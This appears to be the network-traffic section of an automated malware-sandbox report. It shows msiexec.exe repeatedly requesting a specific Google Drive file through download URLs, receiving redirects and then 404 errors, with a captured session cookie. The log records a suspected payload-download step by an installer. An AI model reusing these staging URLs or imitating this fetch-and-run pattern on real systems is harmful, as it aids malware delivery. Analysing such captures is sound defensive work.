                                                                                          Jan 10, 2025 15:18:02.866219044 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:02.866261005 CET44350039142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:02.866314888 CET50039443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:14.345534086 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.345804930 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.345814943 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.988796949 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.988955975 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.989804983 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.989813089 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.989886999 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.989892960 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425324917 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425442934 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425457001 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.425471067 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425494909 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.425529957 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425546885 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.425587893 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.465800047 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.465837002 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.682092905 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:15.682137966 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.682209969 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:15.682482004 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:15.682492971 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.321924925 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.322069883 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.322725058 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.322771072 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.324469090 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.324477911 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.324707985 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.327398062 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.327763081 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.375329018 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.713649035 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.713706017 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.713730097 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.713824034 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.713824034 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.713903904 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.714143038 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.720103025 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:16.720151901 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.720212936 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:16.720472097 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:16.720487118 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.373409986 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.373564005 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.373994112 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.374006987 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.374214888 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.374260902 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830306053 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830374956 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830393076 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830406904 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830432892 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830472946 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830487967 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830502033 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830528021 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830550909 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.831470013 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.831495047 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.947499037 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:17.947551012 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.947655916 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:17.948123932 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:17.948146105 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.581167936 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.581288099 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.582046986 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.582098961 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.583587885 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.583600044 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.583844900 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.583893061 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.584160089 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.631326914 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972038984 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972106934 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972121000 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972165108 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972259998 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972299099 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972343922 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972938061 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:18.972979069 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.973051071 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:18.973242044 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:18.973253965 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:19.620901108 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:19.621398926 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:19.621561050 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:19.621592045 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:19.621742010 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:19.621757984 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058739901 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058809996 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058809042 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:20.058835983 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058875084 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:20.058883905 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058896065 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058916092 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:20.058943987 CET50055443192.168.2.6216.58.206.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:16:57.639956951 CET | 60935 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 15:16:57.646770954 CET | 53 | 60935 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 15:16:58.770102978 CET | 61054 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 15:16:58.777579069 CET | 53 | 61054 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 15:16:57.639956951 CET | 192.168.2.6 | 1.1.1.1 | 0xa5c1 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:16:58.770102978 CET | 192.168.2.6 | 1.1.1.1 | 0x92c | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 15:16:57.646770954 CET | 1.1.1.1 | 192.168.2.6 | 0xa5c1 | No error (0) | drive.google.com | | 142.250.185.110 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:16:58.777579069 CET | 1.1.1.1 | 192.168.2.6 | 0x92c | No error (0) | drive.usercontent.google.com | | 216.58.206.65 | A (IP address) | IN (0x0001) | false

                                                                                          • drive.google.com
                                                                                          • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49917 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:16:58 UTC | 216 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
2025-01-10 14:16:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:16:58 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-1gBZ1HlJZ9olZdkpoDnqDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49923 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:16:59 UTC | 258 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
2025-01-10 14:16:59 UTC | 2226 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC6MDHQ11rPu1adBbHNkRayT-uroBYsCNflam6rz9IHkAO_KzEyDBJqdZn4d52xK9kLN-mrz51U
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:16:59 GMT
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-QRH0QhO-P5se56J6v6NGyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Set-Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi; expires=Sat, 12-Jul-2025 14:16:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
2025-01-10 14:16:59 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m-sjl1060oXxsvVQjB1P4A">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49935 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:17:01 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
2025-01-10 14:17:01 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:01 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-aw-Y8r_UWJQjIU0cdxRT_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49943 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:17:02 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
2025-01-10 14:17:03 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ6BhDpkV-D47NIWF0-Ojw0sI9rWVmwb9i0W_PbqZSxqMrdsHEJYI-tvEt5tWGqq6MK
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:03 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-gTuLSh2rz4pzG4Zk2X10ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
2025-01-10 14:17:03 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4lytV8DxGV8TDd5vBa4tHQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49953 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:17:04 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
2025-01-10 14:17:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:04 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-0272hEQtgnCCu57-S4yljQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49960 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:17:05 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
2025-01-10 14:17:05 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC5JD61p-3jHVETiBQwQs1VdrMBP95nXD9sjHgdSmmuisaEFojM56f9ALz3swoaf351z0tRu03Q
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:05 GMT
